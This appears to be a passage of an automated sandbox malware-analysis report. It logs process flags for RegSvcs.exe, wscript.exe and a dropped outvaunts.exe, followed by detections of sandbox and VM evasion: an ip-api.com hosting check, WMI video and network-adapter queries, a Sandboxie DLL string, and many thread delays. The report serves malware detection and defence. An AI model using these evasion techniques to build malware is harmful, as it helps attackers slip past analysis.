                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 5752, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 6156, type: MEMORYSTR
                    Check if machine is in data center or colocation facility
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Switches to a custom stack to bypass stack traces
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeAPI/Special instruction interceptor: Address: 1111EFC
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeAPI/Special instruction interceptor: Address: 17CF114
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                    Source: outvaunts.exe, 00000002.00000002.2069036182.0000000001B30000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2184485388.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2187480515.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, outvaunts.exe, 00000005.00000002.2187439534.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4511232795.0000000002B41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599844Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599734Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599624Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599515Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599398Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599252Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599125Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598889Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598781Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598672Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598562Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598453Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598343Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598234Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598124Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598015Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597906Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597796Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597687Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597578Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597468Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597359Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597249Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597140Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597031Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596921Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596790Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596672Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596560Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596437Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596324Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596217Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596094Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595984Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595874Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595765Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595656Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595546Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595437Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595328Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595218Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595109Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594999Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594890Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594781Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594672Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594562Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594453Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599891Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599781Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599672Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599562Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599453Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599331Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599203Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599094Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598982Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598875Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598766Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598656Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598547Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598438Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598297Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598092Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597953Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597672Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597540Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597438Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597328Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597219Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597109Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596891Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596781Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596672Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596563Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596438Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596328Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596219Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596094Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595985Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595860Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595735Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595610Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595438Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595115Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594975Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594859Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594750Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594641Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594531Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594422Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594312Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594203Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594094Jump to behavior
